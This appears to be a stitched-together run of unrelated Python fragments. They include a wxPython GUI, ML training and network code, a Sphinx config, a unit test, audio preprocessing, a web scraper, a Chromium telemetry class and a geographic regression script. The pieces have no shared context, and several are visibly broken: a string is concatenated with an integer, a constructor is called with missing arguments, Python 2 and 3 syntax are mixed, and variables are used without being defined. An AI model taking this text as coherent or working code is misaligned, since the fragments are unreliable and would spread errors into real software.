self.m_checkBox17 = wx.CheckBox( self, wx.ID_ANY, u"2", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox17, wx.GBPosition( 0, 3 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox18 = wx.CheckBox( self, wx.ID_ANY, u"3", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox18, wx.GBPosition( 0, 4 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox19 = wx.CheckBox( self, wx.ID_ANY, u"4", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox19, wx.GBPosition( 0, 5 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox20 = wx.CheckBox( self, wx.ID_ANY, u"5", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox20, wx.GBPosition( 0, 6 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox21 = wx.CheckBox( self, wx.ID_ANY, u"6", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox21, wx.GBPosition( 0, 7 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox22 = wx.CheckBox( self, wx.ID_ANY, u"7", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox22, wx.GBPosition( 0, 8 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox23 = wx.CheckBox( self, wx.ID_ANY, u"8", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox23, wx.GBPosition( 0, 9 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox24 = wx.CheckBox( self, wx.ID_ANY, u"9", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox24, wx.GBPosition( 0, 10 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_textCtrl1 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_textCtrl1, wx.GBPosition( 0, 12 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) bSizer2.Add( gbSizer2, 1, wx.EXPAND, 5 ) self.SetSizer( bSizer2 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.Bind( wx.EVT_CHECKBOX, self.OnChar) self.m_textCtrl1.Bind( wx.EVT_TEXT, self.OnText ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnChar( self, event ): print("dd") cb = event.GetEventObject() print (cb.GetLabel(),' is clicked',cb.GetValue()) event.Skip() def OnText( self, event ): cb = event.GetEventObject() print(self.m_textCtrl1.GetValue()) #SetValue(value) event.Skip() if __name__ == "__main__": app = wx.App() frame = MyFrame1(None) frame.Show() app.MainLoop() #使用wxPython获取系统剪贴板中的数据的教程 erow/disentanglement_lib from argparse import ArgumentParser import gin from pytorch_lightning.loggers.wandb import WandbLogger import wandb from disentanglement_lib.data.ground_truth.ground_truth_data import RandomAction from disentanglement_lib.data.ground_truth.named_data import get_named_ground_truth_data from disentanglement_lib.methods.shared.architectures import * from disentanglement_lib.methods.unsupervised import train from disentanglement_lib.methods.unsupervised import callbacks import os import pytorch_lightning as pl from disentanglement_lib.methods.unsupervised.model import Regularizer os.environ['WANDB_TAGS']='annealed_test' os.environ['WANDB_PROJECT']='IFP' @gin.configurable('annealed_test') class AnnealedTest(Regularizer): def __init__(self, gamma = 10, beta_max = 70, stage_steps=gin.REQUIRED): super().__init__() self.stage_steps = stage_steps self.gamma = gamma self.beta_max = beta_max def forward(self, data_batch, model, kl, z_mean, z_logvar, z_sampled): """Training compatible model function.""" global_step = model.global_step k = global_step/self.stage_steps beta = (np.exp(-self.gamma*k)*self.beta_max + 1) model.summary['beta'] = beta return beta * (kl.sum()) @gin.configurable('action') def get_action(dataset,index=gin.REQUIRED): return RandomAction(dataset,index) parser = ArgumentParser() parser.add_argument('--seed',type=int,default=99) parser.add_argument('--dataset',type=str,default='dsprites_full') parser.add_argument('--num_latent',type=int,default=1) parser.add_argument('-s', '--steps', type=int, default=8000) parser.add_argument('-g','--gamma',type=float,default=15) if __name__ == "__main__": args, unknown = parser.parse_known_args() if len(unknown)==0: seed= args.seed steps = args.steps gamma = args.gamma bindings= [ "model.regularizers = [@annealed_test()]", f"annealed_test.stage_steps={steps}", f"annealed_test.gamma={gamma}", f"model.seed={seed}", f"dataset.name='{args.dataset}'", f"model.num_latent={args.num_latent}" ] gin.parse_config(bindings) else: unknown = [i.strip('--') for i in unknown] + ["model.regularizers = [@annealed_test()]"] print(unknown) gin.parse_config(unknown) dataset = get_named_ground_truth_data() action = get_action(dataset) rs = np.random.RandomState(0) w,h,c = dataset.observation_shape pl_model = train.PLModel(input_shape=[c,w,h]) dl = torch.utils.data.DataLoader(train.Iterate(action), 64,num_workers=2,pin_memory=True) logger = WandbLogger() trainer = pl.Trainer( logger, # progress_bar_refresh_rate=500, # disable progress bar max_steps=steps, checkpoint_callback=False, callbacks=[ callbacks.EarlyStop(), callbacks.Visualization(2000), ], gpus=1,) trainer.fit(pl_model, dl) wandb.join() 0 # -*- coding: utf-8 -*- # # import os, sys # sys.path.insert(0, os.path.abspath(os.path.join('.', 'ext'))) import sphinx_rtd_theme extensions = ['sphinx.ext.todo', 'sphinx_rtd_theme', 'sphinx.ext.mathjax'] project = html_title = 'CARS Cloud Data' copyright = 'Public Domain' author = '' release = '1.0' html_short_title = 'millenia.cars.aps.anl.gov/cloud' pygments_style = 'sphinx' html_theme = 'sphinx_rtd_theme' templates_path = ['_templates'] source_suffix = '.rst' source_encoding = 'utf-8' master_doc = 'index' exclude_trees = ['_build'] add_function_parentheses = True add_module_names = False html_static_path = ['_static'] html_favicon = '_static/uchicago_logo.ico' language = None html_theme_options = { 'logo_only': False, 'display_version': False, 'prev_next_buttons_location': 'bottom', 'style_external_links': False, # True, # 'style_nav_header_background': 'white', # Toc options 'collapse_navigation': True, 'sticky_navigation': True, 'navigation_depth': 3, 'includehidden': True, 'titles_only': False } from src.models.sighting import Sighting import unittest import json import os class SightingModelTest(unittest.TestCase): """Sighting Model test cases.""" @classmethod def setupClass(cls): try: sighting = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '../templates/models/sighting.json'))) cls.sighting = json.load(sighting) except NameError as e: raise Exception('No Sighting Model Class defined!') @classmethod def teardownClass(cls): pass def setUp(self): try: sighting = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '../templates/models/sighting.json'))) self.sighting = json.load(sighting) except NameError as e: raise Exception('No Sighting Model Class defined!') def tearDown(self): pass # clean up def test_from_json(self): sighting = Sighting.from_json(self, self.sighting) self.assertIsInstance(sighting, Sighting) self.assertTrue(hasattr(sighting, "id")) self.assertEqual(sighting.id, 1) self.assertTrue(hasattr(sighting, "attribute_id")) self.assertEqual(sighting.attribute_id, 164373) self.assertTrue(hasattr(sighting, "event_id")) self.assertEqual(sighting.event_id, 625) self.assertTrue(hasattr(sighting, "org_id")) self.assertEqual(sighting.org_id, 1) self.assertTrue(hasattr(sighting, "date_sighting")) self.assertEqual(sighting.date_sighting, "1505767537") self.assertTrue(hasattr(sighting, "source")) self.assertEqual(sighting.source, "") self.assertTrue(hasattr(sighting, "uuid")) self.assertEqual(sighting.uuid, "59c03071-f480-4311-a710-03edc0a83832") def test_to_json(self): sighting = Sighting.from_json(self, self.sighting) self.assertDictEqual(sighting.to_json(), self.sighting) from scipy.io.wavfile import read import numpy as np import audio import soundfile as sf def _process_utterance(wav_path, hparams): try: # Load the audio as numpy array sr, wav = read(wav_path) wav = wav.astype(np.float32) MAX_WAV_VALUE = 32768.0 wav = wav / MAX_WAV_VALUE except FileNotFoundError: # catch missing wav exception print('file {} present in csv metadata is not present in wav folder. skipping!'.format( wav_path)) return None except Exception as e: wav, sr = sf.read(wav_path) D = audio._stft(wav, hparams) mel_spectrogram = audio._linear_to_mel(np.abs(D), hparams) if hparams.vocoder == 'waveglow': mel_spectrogram = audio.dynamic_range_compression(mel_spectrogram) else: mel_spectrogram = audio.amp_to_db(mel_spectrogram) mel_spectrogram = audio.normalize(mel_spectrogram, hparams) mel_spectrogram = (mel_spectrogram * 8.) - 4. mel_spectrogram = mel_spectrogram.astype(np.float32) mel_frames = mel_spectrogram.shape[1] constant_values = 0. if hparams.use_lws: # Ensure time resolution adjustement between audio and mel-spectrogram fft_size = hparams.n_fft if hparams.win_size is None else hparams.win_size l, r = audio.pad_lr(wav, fft_size, audio.get_hop_size(hparams)) # Zero pad audio signal out = np.pad(wav, (l, r), mode='constant', constant_values=constant_values) else: # Ensure time resolution adjustement between audio and mel-spectrogram l_pad, r_pad = audio.librosa_pad_lr(wav, hparams.n_fft, audio.get_hop_size(hparams), 1) # Reflect pad audio signal (Just like it's done in Librosa to avoid frame inconsistency) out = np.pad(wav, (l_pad, r_pad), mode='constant', constant_values=constant_values) assert len(out) >= mel_frames * audio.get_hop_size(hparams) # time resolution adjustement # ensure length of raw audio is multiple of hop size so that we can use # transposed convolution to upsample out = out[:mel_frames * audio.get_hop_size(hparams)] assert len(out) % audio.get_hop_size(hparams) == 0 return out, mel_spectrogram """ randomwave ======== Generates a random value between 0 and 1, of programmable period. Arguments:: { "period" : the period with which the random value is updated e.g. "PT1H" "lower" : (optional) numbers will be returned within range (lower,upper) - if not specified then range is (0.0, 1.0] "upper" : (optional) "precision" : (optional) 1 for integer, 10 for 1 decimal point, 100 for 2 decimals etc. } """ from .timefunction import Timefunction import isodate import math import random import logging # Because any time-function has to be able to generate the value of its waveform instantaneously for any moment # in time, we cannot iterate to produce randomness (e.g. LFSR). # And also, we have to base the random number off of time (so that if we want a period of e.g. 1D then it only changes every 1D) class Randomwave(Timefunction): """Generates random waves of defined period""" def __init__(self, engine, device, params): self.engine = engine self.device = device self.period = float(isodate.parse_duration(params.get("period", "PT1H")).total_seconds()) self.lower = params.get("lower", 0.0) self.upper = params.get("upper", 1.0) self.precision = params.get("precision", None) self.initTime = engine.get_now() def state(self, t=None, t_relative=False): """Return a random wave""" if t is None: t = self.engine.get_now() if (not t_relative): t -= self.initTime r = random.Random() # Our own private random number generator quantised_time = int(t / self.period) r.seed(quantised_time + hash(self.device.get_property("$id"))) # Unique per device r.random() r.random() r.random() v = self.lower + r.random() * (self.upper-self.lower) if self.precision is not None: v = int(v * self.precision) / float(self.precision) return v def next_change(self, t=None): """Return a future time when the next event will happen""" if t is None: t = self.engine.get_now() t -= self.initTime p = float(self.period) t2 = math.floor(t / p) * p + p t2 += self.initTime return t2 def period(self): return float(self.period) # Check randomness class dummy_engine(): def get_now(self): return 0.0 if __name__ == "__main__": r = Randomwave(dummy_engine(), {"period" : "PT1S"}) for t in xrange(1000): print(r.state(t/10.0)) from __future__ import division #this will we used only in python 2 but by using this we get the float value import numpy as np print 5/2 1-10 import bs4 import click import requests from pymuseum.scrapers.base import AbstractScraper from pymuseum.scrapers import register_cmd class ArtUKscraper(AbstractScraper): def __init__(self, *args, **kwargs): self.url = "https://artuk.org/discover/artworks" super().__init__(*args, **kwargs) def get_image_path(self, **metadata): extension = metadata['url'].split('.')[-1] filename = metadata['title'] + ' - ' + metadata['artist'] + '.' + extension filename = self.sanitize_filename(filename) return str((self.save_path / filename).absolute()) def get_next_page_url(self): return self.url def get_images(self): entries = self.page.find_all('li', class_='item') for entry in entries: infos = entry.find_all('div', class_='info')[0] title = infos.find_all('div', class_="title")[0] artist = infos.find_all('div', class_="artist")[0] metadata = { 'artist': artist.text, 'title': title.text } entry_link = entry.a.attrs['href'] entry_page = requests.get(entry_link, headers=self.headers) if not entry_page.ok: continue entry_page = bs4.BeautifulSoup(entry_page.content, "lxml") link = entry_page.find_all('div', class_='artwork')[0].img.attrs['src'] metadata['url'] = link yield link, metadata @register_cmd @click.command('artuk') @click.pass_context def artuk_cmd(ctx): scraper = ArtUKscraper(save_path=ctx.obj['save_path'], dry_run=ctx.obj['dry_run']) scraper.scrap(ctx.obj['max_images']) validations/__init__.py ''' Input validations. ''' from .argsparser import is_percentage, is_valid_n, is_positive_int, are_valid_dimensions, is_valid_p, is_time #!/usr/bin/env python ''' Copyright 2016, EMC, Inc Author(s): ''' # set path to common libraries import fit_path # NOQA: unused import import sys import subprocess import fit_common # validate command line args fit_common.mkargs() # Run tests EXITCODE = fit_common.run_nose() exit(EXITCODE) import numpy as np import torch import torch.nn as nn import torch.nn.functional as F def hidden_init(layer): fan_in = layer.weight.data.size()[0] lim = 1. / np.sqrt(fan_in) return -lim, lim class FcNetwork(nn.Module): """Actor (Policy) Model.""" def __init__(self, state_size, action_size, seed, hidden_layers, act_func): """Initialize parameters and build model. Params ====== state_size (int): Dimension of each state action_size (int): Dimension of each action seed (int): Random seed hidden_layers: array of dimensions of hidden layers act_func: activation function in layers """ super(FcNetwork, self).__init__() self.seed = torch.manual_seed(seed) self.hidden_layers = nn.ModuleList([nn.Linear(state_size, hidden_layers[0])]) # Add a variable number of more hidden layers layer_sizes = zip(hidden_layers[:-1], hidden_layers[1:]) self.hidden_layers.extend([nn.Linear(h1, h2) for h1, h2 in layer_sizes]) self.batch_norm = nn.ModuleList([nn.BatchNorm1d(d) for d in hidden_layers]) self.output = nn.Linear(hidden_layers[-1], action_size) self.act_func = act_func self.reset_parameters() def reset_parameters(self): for hl in self.hidden_layers: hl.weight.data.uniform_(*hidden_init(hl)) self.output.weight.data.uniform_(-3e-3, 3e-3) class Actor(FcNetwork): """Actor (Policy) Model.""" def __init__(self, state_size, action_size, seed, hidden_layers, act_func=F.relu): """Initialize parameters and build model. Params ====== state_size (int): Dimension of each state action_size (int): Dimension of each action seed (int): Random seed hidden_layers: array of dimensions of hidden layers act_func: activation function in layers """ super(Actor, self).__init__(state_size, action_size, seed, hidden_layers, act_func) def forward(self, x): for linear, bn in zip(self.hidden_layers, self.batch_norm): x = self.act_func(bn(linear(x))) x = torch.tanh(self.output(x)) return x class Critic(nn.Module): """Critic (Value) Model.""" def __init__(self, state_size, action_size, seed, hidden_layers, act_func=F.relu): """Initialize parameters and build model. Params ====== state_size (int): Dimension of each state action_size (int): Dimension of each action seed (int): Random seed hidden_layers: array of dimensions of hidden layers act_func: activation function in layers """ super(Critic, self).__init__() self.seed = torch.manual_seed(seed) self.batch_norm = nn.ModuleList([nn.BatchNorm1d(d) for d in hidden_layers]) self.hidden_layers = nn.ModuleList([nn.Linear(state_size, hidden_layers[0])]) self.hidden_layers.append(nn.Linear(hidden_layers[0] + action_size, hidden_layers[1])) self.output = nn.Linear(hidden_layers[-1], action_size) self.act_func = act_func self.reset_parameters() def reset_parameters(self): for hl in self.hidden_layers: hl.weight.data.uniform_(*hidden_init(hl)) self.output.weight.data.uniform_(-3e-3, 3e-3) def forward(self, state, action): """Build a critic (value) network that maps (state, action) pairs -> Q-values.""" xs = self.act_func(self.batch_norm[0](self.hidden_layers[0](state))) x = torch.cat((xs, action), dim=1) x = self.act_func(self.batch_norm[1](self.hidden_layers[1](x))) return self.output(x) briyonce/SCWAT #!/usr/bin/env python import json range_n = 100 test_data = { "name" : "test_" + range_n , "children" : [] } print( "creating test data" ) for x in range( range_n ): name_1 = str( x ) child_1 = { "name" : name_1, "children" : [] } for y in range( range_n ): name_2 = str(x) + "_" + str(y) child_2 = { "name" : name_2, "children" : [] } for z in range( range_n ): name_3 = str(x) + "_" + str(y) + "_" + str(z) child_3 = { "name" : name_3, "size" : 100 } child_2[ 'children' ].append( child_3 ) child_1[ 'children' ].append( child_2 ) test_data[ 'children' ].append( child_1 ) print("done creating data") print("storing data in json file....") with open( 'test_' + str(range_n) + '.json', 'w' ) as outfile: json.dump( test_data, outfile, indent = 4 ) print("complete") # Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import telemetry.timeline.event as timeline_event class Slice(timeline_event.TimelineEvent): """A Slice represents an interval of time plus parameters associated with that interval. NOTE: The Sample class implements the same interface as Slice. These must be kept in sync. All time units are stored in milliseconds. """ def __init__(self, parent_thread, category, name, timestamp, duration=0, thread_timestamp=None, thread_duration=None, args=None): super(Slice, self).__init__( category, name, timestamp, duration, thread_timestamp, thread_duration, args) self.parent_thread = parent_thread self.parent_slice = None self.sub_slices = [] self.did_not_finish = False def AddSubSlice(self, sub_slice): assert sub_slice.parent_slice == self self.sub_slices.append(sub_slice) def IterEventsInThisContainerRecrusively(self, stack=None): # This looks awkward, but it lets us create only a single iterator instead # of having to create one iterator for every subslice found. if stack == None: stack = [] else: assert len(stack) == 0 stack.extend(reversed(self.sub_slices)) while len(stack): s = stack.pop() yield s stack.extend(reversed(s.sub_slices)) @property def self_time(self): """Time spent in this function less any time spent in child events.""" child_total = sum( [e.duration for e in self.sub_slices]) return self.duration - child_total @property def self_thread_time(self): """Thread (scheduled) time spent in this function less any thread time spent in child events. Returns None if the slice or any of its children does not have a thread_duration value. """ if not self.thread_duration: return None child_total = 0 for e in self.sub_slices: if e.thread_duration == None: return None child_total += e.thread_duration return self.thread_duration - child_total def _GetSubSlicesRecursive(self): for sub_slice in self.sub_slices: for s in sub_slice.GetAllSubSlices(): yield s yield sub_slice def GetAllSubSlices(self): return list(self._GetSubSlicesRecursive()) def GetAllSubSlicesOfName(self, name): return [e for e in self.GetAllSubSlices() if e.name == name] 1-10 # FractureProof ## Version 3 ### Model Script - Mr. FractureProof's Woodcarvings ## Layer Step 1: Geographic Weighted Regression ls1 = 'Step 4: Geographic Weighted Regression' # Step 4 descriptive title m5 = 'Multi-scale Geographic Weighted Regression' # Model 5 descriptive title ### Geojoin predictor and outcome table with polygons, Get centroid from coordinates gdf_XY = gp.read_file(directory + '_shape/' + f4 + '/cb_2018_us_zcta510_500k.shp') # Import dataset saved as csv in _shape folder gdf_XY['ID'] = gdf_XY['ZCTA5CE10'].astype('str') # Change data type of column in data frame gdf_XY['ID'] = gdf_XY['ID'].str.rjust(5, '0') # add leading zeros of character column using rjust() function gdf_XY['ID'] = 'ZCTA' + gdf_XY['ID'] # Combine string with column gdf_XY = gdf_XY.filter(['ID', 'geometry']) # Keep only selected columns gdf_XY = pd.merge(gdf_XY, df_XY, on = 'ID', how = 'inner') # Geojoins can use pandas merge as long as geo data is first passed in function gdf_XY['x'] = gdf_XY['geometry'].centroid.x # Save centroid coordinates as separate column gdf_XY['y'] = gdf_XY['geometry'].centroid.y # Save centroid coordinates as separate column gdf_XY['coordinates'] = list(zip(gdf_XY['x'], gdf_XY['y'])) # Save individual coordinates as column of paired list gdf_XY = gdf_XY.drop(columns = ['x', 'y', 'geometry']) # Drop Unwanted Columns gdf_XY.info() # Get class, memory, and column info: names, data types, obs. ### Setup GWR table gdf_gwr = gdf_XY.set_index('ID') # Set ID column as index wood = gdf_gwr[mrfractureproof].columns.to_list() # Save fractureproof variables as list for GWR wood.append('quant') # Add outcome to list of gwr variables wood.append('coordinates') # Add coordinates to list of gwr variables wood.remove('D2-4_72') # Remove non-significant variables manually wood.remove('D2-4_34') # Remove non-significant variables gdf_gwr = gdf_gwr[wood] # Subset dataframe by sleetced variables gdf_gwr = gdf_gwr.dropna() # Drop all rows with NA values c = list(gdf_gwr["coordinates"]) # save coordinates column as list x = gdf_gwr.drop(columns = ['quant', 'coordinates']).values # save selected features as numpy array y = gdf_gwr['quant'].values # save target as numpy array y = np.transpose([y]) # Transpose numpy array to fit GWR input gdf_gwr.info() # Get class, memory, and column info: names, data types, obs. ### Create GWR model mgwr_selector = Sel_BW(c, y, x, multi = True) # create model to calibrate selector mgwr_bw = mgwr_selector.search(multi_bw_min = [2]) # search for selectors with minimum of 2 bandwidths, this may take a while mgwr_results = MGWR(c, y, x, mgwr_selector).fit() # fit MGWR model, this may take a while mgwr_results.summary() # Show MGWR summary ### Export GWR results to new table wood.remove('quant') # Remove outcome to list of gwr variables wood.remove('coordinates') # Remove coordinates to list of gwr variables wood = ['Intercept'] + wood # Insert intercept label at front of gwr variable list df_gwr = pd.DataFrame(mgwr_results.params, columns = [wood]) # Create data frame of importances with variables and gini column names gdf_ID = gdf_gwr.reset_index() # Reset index on GWR inputs df_gwr['ID'] = gdf_ID['ID'] # Ad ID column from GWR inputs table df_gwr.info() # Get class, memory, and column info: names, data types, obs. ### Join first and second geographic layer lables df_layer = pd.read_csv('_data/FIPS_ZCTA_key.csv') # Import layer key dataset saved as csv in _data folder df_layer = df_layer.filter(['FIPS', 'ZCTA']) # Keep only selected columns df_layer = df_layer.rename(columns = {ID: 'ID', 'FIPS': 'ID_2'}) # Rename geographic identifiers as standard features gdf_ID_2 = gdf_gwr.reset_index() # Reset Index as second geographic layer ID adn save as gdf for later df_gwr = pd.merge(gdf_gwr, df_layer, on = 'ID', how = 'left') # Join zip code geo weighted coefficients to county labels df_gwr = df_gwr.dropna() # Drop all rows with NA values df_gwr = df_gwr.set_index('ID') # Set first layer ID column as index df_gwr = df_gwr.drop(columns = ['coordinates', 'quant']) # Drop Unwanted Columns df_gwr = df_gwr.groupby(['ID_2'], as_index = False).mean() # Group 1st layer GWR coefficents by 2nd layer identifiers and calculate average df_gwr.info() # Get class, memory, and column info: names, data types, obs. ### Create Multi-level categories based bandwidths df_bw = df_gwr.drop(columns = ['ID_2']) # Drop Unwanted Columns df_bw = df_bw.apply(st.zscore).abs() # Calculate absolute value of z-score for mean GWR coefficients in second layer df_bw['ID_2'] = df_gwr['ID_2'] # Save second layer identifiers from GWR dataset df_bw = df_bw.set_index('ID_2') # Set second layer identifiers as index bw = df_bw.idxmax(axis = 1) # Get second layer identifiers that have highest absolute value of z score l_bw = list(zip(df_bw.index, bw)) # Create list of variables alongside RFE value df_bw = pd.DataFrame(l_bw, columns = ['ID_2', 'multi']) # Create data frame of 1st layer features and 2nd layer identifiers df_bw['multi'] = df_bw['multi'].astype('category') # Save features as multi-level categoriacl variable with standard name df_bw['multi'] = df_bw['multi'].cat.codes # Convert string lable into numeric codes df_bw.info() # Get class, memory, and column info: names, data types, obs. ### Append step 4 results to corresponding text file text_file = open('_results/' + label + '.txt', 'a') # Write new corresponding text file text_file.write(s4 + '\n\n') # Step title text_file.write('Models: ' + m5 + '\n\n') # Model title text_file.write('Bandwidths: ' + str(mgwr_bw) + '\n\n') # Result description, result list text_file.write('Mean Coefficients by County: ' + '\n\n') # Result description text_file.write(str(df_gwr.describe()) + '\n\n') # Result descriptive statistics text_file.write('####################' + '\n\n') # Add section break for end of step text_file.close() # Close file ## Step 5: Data Processing of 2nd Geographic Layer ls5 = 'Step 5: Raw Data Processing and Feature Engineering (2nd Geographic Layer)' # Step 5 descriptive title d3 = 'Health Resources and Servcies Administration Area Heath Resource File Populaton Rates by County 2014-2018 5-year Average' # Dataset 3 descriptive title ### Preprocess Third Dataset df_d3 = pd.read_csv('_data/' + f3 + '_stage.csv') # Import third dataset saved as csv in _data folder df_d3 = df_d3.rename(columns = {'FIPS': 'ID_2'}) # Apply standard name to identifier used for joining 2nd layer datasets df_d3.info() # Get class, memory, and column info: names, data types, obs ### Join Datasets by second layer identifier and define targets df_XY_2 = pd.merge(df_d3, df_bw, on = 'ID_2', how = 'inner') # Join datasets to create table with predictors and outcome df_XY_2.info() # Get class, memory, and column info: names, data types, obs. ### Create second layer outcome table df_Y_2 = df_XY_2.filter(['multi', 'ID_2']) # Create Outcome table for second layer df_Y_2 = df_Y_2.set_index('ID_2') # Set second layer identifier as index df_Y_2.info() # Get class, memory, and column info: names, data types, obs. ### Create second layer standard scaled predictor table df_X_2 = df_XY_2.drop(columns = ['multi', 'ID_2']) # Drop Unwanted Columns df_X_2 = df_X_2.replace([np.inf, -np.inf], np.nan) # Replace infitite values with NA df_X_2 = df_X_2.dropna(axis = 1, thresh = 0.75*len(df_X_2)) # Drop features less than 75% non-NA count for all columns df_X_2 = pd.DataFrame(SimpleImputer(strategy = 'median').fit_transform(df_X_2), columns = df_X_2.columns) # Impute missing data df_X_2 = pd.DataFrame(StandardScaler().fit_transform(df_X_2.values), columns = df_X_2.columns) # Standard scale values by converting the normalized features into a tabular format with the help of DataFrame. df_X_2['ID_2'] = df_XY_2['ID_2'] # Save ID as column in predictor table df_X_2 = df_X_2.set_index('ID_2') # Set identifier as index df_X_2.info() # Get class, memory, and column info: names, data types, obs. ### Append step 5 results to corresponding text file text_file = open('_results/' + label + '.txt', 'a') # Write new corresponding text file text_file.write(s5 + '\n\n') # Step descriptive title text_file.write(d3 + '\n') # Dataset descriptive title text_file.write('Target labels: multi = selected varibles from step 2 with highest average absolute value of z-score by identifier' + '\n') # Dataset methods description text_file.write('Target processing: None' + '\n\n') # Dataset methods description text_file.write(str(df_Y_2.describe()) + '\n\n') # Result summary text_file.write('Feature labels: AHRF Population Rates' + '\n') # Dataset methods description text_file.write('Feature processing: 75% nonNA, Median Imputed NA, Standard Scaled' + '\n\n') # Dataset methods description text_file.write('Rows, Columns: ' + str(df_X_2.shape) + '\n\n') # Result description and result list text_file.write('####################' + '\n\n') # Add section break for end of step text_file.close() # Close file ## Step 6: Identify 2nd Layer Predictors s5 = 'Step 6: Identify 2nd Layer Predictors' # Step 6 descriptive title m6 = 'Support Vector Machines' # Model 6 descriptive title ### Support Vector Machines vector = LinearSVC() # Support vector machines with a linear kernel for multi-level categorical outrcomes vector.fit(df_X_2, df_Y_2['multi']) # fit model svm = vector.coef_ # Save coefficients for each category by feature df_svm = pd.DataFrame(svm, columns = df_X_2.columns, index = [fractureproof]) # Create data frame of coefficients by 2nd layer features and 1st layer features df_svm = df_svm.abs() # Get absolute value of all coefficients svm_max = df_svm.idxmax(axis = 1) # Get 2nd layer features that have highest values for each 1st layer feature l_svm_max = list(zip(df_svm.index, svm_max)) # Create list of 2nd layer features along 1st layer features df_svm_max = pd.DataFrame(l_svm_max, columns = ['GWR', 'Feature']) # Create data frame of 2nd layer features along 1st layer features carving = df_svm_max['Feature'].unique() # Print unique values in column to remove duplicate 2nd layer features and save as list df_svm_max.info() # Get class, memory, and column info: names, data types, obs. ### Principal Component Analysis degree = len(df_X_2[carving].columns) - 1 # Save number of features -1 to get degrees of freedom pca = PCA(n_components = degree) # Pass the number of components to make PCA model based on degrees of freedom pca.fit(df_X_2[carving]) # Fit initial PCA model ### Variance ratios and component Loadings cvr = pca.explained_variance_ratio_.cumsum() # Save cumulative variance ratio comps = np.count_nonzero(cvr) - np.count_nonzero(cvr > 0.95) + 1 # Save number of components above threshold value load = pca.components_.T * np.sqrt(pca.explained_variance_) # Export component loadings df_load = pd.DataFrame(load, index = df_X_2[carving].columns) # Create data frame of component loading df_load = df_load.iloc[:, 0:comps] # Save columns by components above threshold df_load = df_load.abs() # get absolute value for column or data frame df_load = df_load[df_load > 0.5] # Subset by character df_load = df_load.dropna(thresh = 1) # Drop all rows without 1 non-NA value df_load = df_load.dropna(axis = 'columns', thresh = 1) # Drop all rows without 1 non-NA value woodcarving = df_load.index.to_list() # Save final set of 2nd layer features to list df_load.info() # Get class, memory, and column info: names, data types, obs. ### Add 2nd layer feature labels df_l3 = pd.read_csv('_data/' + f3 + '_labels.csv') # Import dataset saved as csv in _data folder df_l_3 = df_l3.filter(['Feature', 'Label']) # Keep only selected columns df_l_3 = df_l_3.set_index('Feature') # Set column as index df_l_3 = df_l_3.transpose() # Switch rows and columns df_lwc = df_l_3[woodcarving] # Subset by 2nd layer selected featres df_lwc = df_lwc.transpose() # Switch rows and columns df_lwc = df_lwc.reset_index() # Reset index l_lwc = list(zip(df_lwc['Feature'], df_lwc['Label'])) # Create list of variables alongside RFE value df_lwc.info() # Get class, memory, and column info: names, data types, obs. ### Append step 6 results to corresponding text file text_file = open('_results/' + label + '.txt', 'a') # Write new corresponding text file text_file.write(s6 + '\n\n') # Step description text_file.write('Models: ' + m5 + '\n\n') # Model description text_file.write('Values: Coefficients' + '\n') # Model methods description text_file.write('Thresholds: Max Absolute Value' + '\n\n') # Model methods description text_file.write(str(df_svm_max) + '\n\n') # Result dataframe text_file.write('Models: ' + m1 + '\n\n') # Model description text_file.write('Cumulative Variance: Threshold = 95%' + '\n') # Model methods description text_file.write(str(cvr) + "\n\n") # Result object text_file.write('Component Loadings' + '\n') # Result description text_file.write(str(df_load) + '\n\n') # Result dataframe text_file.write('Final List of selected 2nd layer features' + '\n') # Result description text_file.write(str(l_lwc) + '\n\n') # Result list text_file.write('####################' + '\n\n') # Add section break for end of step text_file.close() # Close file ## Step 7: Create Informative Prediction Model with both geographic layers s7 = 'Step 7: Create Informative Preidction Model with both geographic layers' # Step 1 descriptive title ### Join Datasets by ID and define targets df_XY_f = pd.merge(df_XY_2, df_layer, on = 'ID_2', how = 'left') # Join datasets to create table with predictors and outcome df_XY_f = pd.merge(df_XY, df_XY_f, on = 'ID', how = 'inner') # Join datasets to create table with predictors and outcome df_XY_f = df_XY_f.drop(columns = ['ID_2', 'multi']) # Drop Unwanted Columns df_XY_f = df_XY_f.dropna(subset = ['quant']) # Drop all outcome rows with NA values df_XY_f.info() # Get class, memory, and column info: names, data types, obs. ### Create Multiple Regression Model mrfractureproofswoodcarvings = mrfractureproof + woodcarving # Combine 2nd layer slected features with first layer regression model features mrfractureproofswoodcarvings.append('quant') # Remove outcome from 1st and 2nd layer regression feature list df_mrfpwc = df_XY_f[mrfractureproofswoodcarvings] # Subset full dataframe with 1st and 2nd layer regression model features df_mrfpwc = df_mrfpwc.dropna() # Drop all NA values from subset dataframe X = df_mrfpwc.drop(columns = ['quant']) # Create dataframe of predictors Y = df_mrfpwc['quant'] # Create dataframe of outcomes mod_f = sm.OLS(Y, X) # Create linear model res_f = mod_f.fit() # Fit model to create result res_f.summary() # Print results of regression model ### Add feature labels df_lf = pd.concat([df_l1, df_l2, df_l3]) 